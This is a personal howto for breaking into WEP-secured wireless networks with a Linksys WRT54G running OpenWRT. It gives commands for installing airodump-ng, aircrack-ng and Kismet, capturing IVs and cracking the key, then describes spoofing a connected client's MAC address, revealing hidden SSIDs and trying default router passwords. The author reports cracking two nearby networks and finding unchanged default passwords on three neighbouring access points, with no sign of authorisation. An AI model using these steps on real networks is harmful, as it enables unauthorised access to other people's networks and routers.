This is a howto for hacking wireless networks secured with 64 or 128 bit WEP keys, discovering hidden SSID’s and spoofing (faking) MAC addresses with the Linksys WRT54G aand OpenWRT firrmware I also tried to give background info where needed.
When To Use This Howto
You should use this howto if you fit the following profile:
The Game Plan
Wep is cracked by assembling IV packets send out by an access point. An IV package gives a little bit of info about the WEP key used. If you assemble enough IV's, you can use Aircrack to retrieve the key used. There's no way of telling if a key is 64 or 128 bit, so you must check for both lengths. Start with 64 bit, as this will be found faster (few minutes).
Airodump-ng is the crucial program that will run on the router to listen to AP's, it puts the IVS sniffed in IVS files. These files will can analyzed by Aircrack for windows. Or by Aircrack on the WRT, but because of the lack of storage on the WRT I used Windows to do the cracking. Also, my Windows CPU is faster that the one in the WRT (WRT runs on a 200 MHz CPU)
To get airodump working, we're going to install OpenWRT on the router and install Aircrack-ng, Kismet Client and Server. Kismet is usefull for unveiling hidden SSID's and client macadresses. The router must be set up in client mode so it can listen to networks.
The following packages on OpenWRT will be installed
Flash the WRT54G
First we’re going to flash the WRT. Make sure you have a LAN connection to the WRT54G. Use the exact firmware mentioned (OpenWRT-wrt54g-jffs2.bin). You can flash the router by using the Web Interface offered by the current firmware on the router. I flashed to OpenWRT from the web interface of alternative firmware ported from Sveasoft. You can also use tfp to flash the router.
Once done, the IP address of the router should be the same as it was before the flash, and you can visit it through the OpenWRT web interface. After logging in the first time you must set a password and reboot your system. After the reboot the router has formatted the filesystem into read/write mode. You should then also be able to login through SCP and SSH by using root as username combined with your password.
Set up the WRT54G in client mode
This section is copied from this site and edited where needed.
Remove the Firewall
The default firewall on OpenWRT provides some basic inbound firewalling and NAT on the WAN interface. I turned it off to prevent unwanted blocking in any way.
chmod 644 /etc/init.d/S45firewall
Optionally, you can also set the hostname of the WRT:
nvram set wan_hostname=MyWrt
Setup WAN Port
The WAN Port is the port at the back of the WRT that has Internet written above the port. It's a port like the rest, but it's in a separate VLAN.
At this point, I configured the WAN port with a valid IP address on my home network, to me to complete the configuration, and to give the WRT internet access via my network (for installing additional packages).
To configure the WAN (vlan1 interface) port, I used the following:
nvram set wan_proto=static
nvram set wan_ipaddr=192.168.3.2
nvram set wan_netmask=255.255.255.0
I wanted to avoid using a 192.168.0.x IP address, as this might conflict with a gateway I could possibly obtain from a DHCP server on my connected Windows Box from a cracked AP later on.
On my Windows Vista Box I set up ICS and changed the IP address of my LAN adapter to 192.168.3.1
Set a default gateway and DNS server:
nvram set wan_gateway=192.168.3.1
nvram set wan_dns=192.168.3.1
Commit the changes, and reboot:
The WAN port was then connected to my network card, and I could telnet to the WRT on the IP address I had given to the WAN interface.
The default OpenWrt configuration has the wireless interface bridged with the LAN ports. To allow routing and firewalling between these interfaces, the bridge needs to be be removed. At the same time, we'll also rename the LAN ports to vlan0:
nvram set lan_ifname=vlan0
nvram unset lan_ifnames
nvram is a tool to configure and add settings to control your router. Use this to see all the settings available:
nvram show | more
Setup LAN Interface
Now that the bridge has been removed, the LAN interface (vlan0) can be configured with a static IP address:
nvram set lan_proto=static
nvram set lan_ipaddr=192.168.3.3
nvram set lan_netmask=255.255.255.0
Setup Wireless Interface
Similarly, the wireless interface (eth1) can be configured:
nvram set wifi_ifname=eth1
nvram set wifi_proto=static
nvram set wifi_ipaddr=192.168.3.100
nvram set wifi_netmask=255.255.255.0
nvram set wifi_gateway=192.168.3.1
nvram set wifi_dns=192.168.3.1
Rather than relying on the WRT to use decide which antenna socket to use, we'll force it to only use the main antenna socket, located next to the power socket (-1=auto, 0=main, 1=aux, 3=diversity):
nvram set wl0_antdiv=0
Note that the antenna designations have changed in the various versions of the WRT. For earlier WRT54G/WRT54GS models, -1=auto, 0=main (next to power socket), 1=aux (next to reset button), 3=diversity.
Starting with WRT54G v2.0 and WRT54GS V1.1 these are reversed 0=main (next to reset button) and 1=aux (next to power jack).
Wireless Client Configuration
Set Client Mode
The wireless mode of the WRT can be set to ap (access point mode), sta (station/client mode), or wet (wireless ethernet bridge, ie, bridged client). As we're using it as a routed client, the mode gets set as follows:
nvram set wl0_mode=sta
When using sta or wet mode, you also need to specify if ad-hoc or infrastructure/managed mode is being used, with 0 used to specify ad-hoc mode, and 1 for managed mode:
nvram set wl0_infra=1
Set the ESSID
The ESSID of the wireless network to connect to needs to be specified:
nvram set wl0_ssid=SGNet
Save and Reboot
Before continuing, commit all changes, and reboot the WRT:
After the WRT has rebooted, verify that the configuration changes have been successfully applied. I connected to a normal LAN port from this point on instead of the WAN Port.
Testing Wireless Connectivity
Test your connection with a utility called wl. Check if it's already installed, otherwise Install wl using
ipkg install wl
ipkg is a tool the download packages from online repositories. If you don't have a internet connection on your WRT, you can upload the packages manually to your router using WinSCP.
src whiterussian http://downloads.openwrt.org/backports/rc5
Once installed, you can use wl to list all the wireless networks that are visible to your WRT, using
wl scan; sleep 1; wl scanresults
Assuming there is at least one wireless network visible, you should see output similar to
Mode: Managed RSSI: -83 dBm noise: -94 dBm Channel: 13
BSSID: 00:0C:F1:96:C9:BD Capability: ESS
Supported Rates: [ 1(b) 2(b) 5.5(b) 11(b) ]
You can also use wl to join any wireless network, using
wl join SGNet
Assuming your WRT can access the internet, get it to update its ipkg database, and then retrieve a list of the available packages:
I updated the existing packages, it's consumed some extra space on the router, and I'm not sure if it was necessary.
Note: if you type
You can see what packages are currently installed.
Re-configure WAN Port
The WAN port isn't required, and hence was configured for on-site administration, to provide a way to locally access the WRT for configuration, if required.
nvram set wan_proto=static
nvram set wan_ipaddr=192.168.1.1
nvram set wan_netmask=255.255.255.0
nvram unset wan_gateway
nvram unset wan_dns
Save and Test
These changes must be committed, and the WRT was rebooted to test the new configuration:
Install the cracking tools
Now install aircrack-ng, kismet client and server onto your WRT! Dependencies are installed automatically if needed.
ipkg install aircrack-ng
ikpg install kismet-server
ipkg install kismet-client
Check this if the packages are not found.
The OpenWRT /tmp directory has 8 MB available for IV files. That’s not too much, so it would be nice to mount a Windows Share in OpenWRT. Unfortunately that did not work out for me. Here’s what I tried:
The good news is that I found out that the 8 MB of storage is not too bad after all. If you download the IVS file from the /tmp directory every day or two, an delete it after that, airodump won’t run out of storage needed for the IVS files.
Running aircrack programs
From the aircrack-ng package on OpenWRT we’re going to use just one program: airodump-ng
Start this program by typing:
wl monitor 1
airodump-ng --ivs --write wep out 7 prism0
Airodump doesn’t seem to listen to all options mentioned above very well. The options given should force airodump in just monitoring Wireless channel 7, in my case, it monitored every channel. Airodump will place the ivs output file in the /tmp directory.
You should so a output windows like this (I anonymized data)
Amount of IV needed
According to different fora, and the aircrack tool, about 250.000 packets are needed for a 64 bit wep key. I was able to crack two networks with less than 100.000 IV’s. Guess I was lucky. I read on different fora’s you need about 1 million IV’s to crack a 128 Bit key. Haven't tested that yet. I captured between 2000 and 5000 IVS an hour from WEP secured networks. So, you'll need anywhere between 2-7 days to crack a 64 bit WEP key without packet injection.
Crack the key with the help of the IV files
I used WinSCP to transport the IVS file to my Windows machine. After that I restarted airodump and got rid of the als IVS file on the WRT54G to prevent running out of space. In my case I needed to do this every 48 hours.
Aircrack-ng 0.9.x GUI in Windows offers the possibility to assemble input from many IVS and CAP/dump files.
After retrieving IVS files, follow these steps:
If you’re lucky you now have the key and you can login to the network. Cracking a 64 bit key should only last a few minutes. I can't give you data on 128 Bit.
Note: if I start Aircrack, my wireless network looses connection, quite odd.
Mac address spoofing and discovering hidden SSIDs
But what if you have the WEP key, and you cannot login to the network yet? Try changing your MAC address in that of a client that's already connected. In the .txt file associated with the IVS you can find some macaddresses of clients.
Kismet can help you get more information.
Now: open a SSH shell with Putty and type:
Open another SSH shell and type
Use the h commando after starting up the client to see all the options. If the server has run for a little while you’ll see hidden SSID showing up.
The cool thing is that Kismet will also tell the brand of the AP’s router. Now you can check if the default password has not been changed. Which was the case in three AP’s near to me.
Cool additional resources
Aircrack video. Mind you, not all steps shown are equal to the one described here.
RemotFileSystemHowTo. Didn't work out for me, but it should be possible.
Cygwin NFS Server HowTo. Again, good tutorial, but didn't work out for me.
That’s all there is to it! Hope you find my information useful!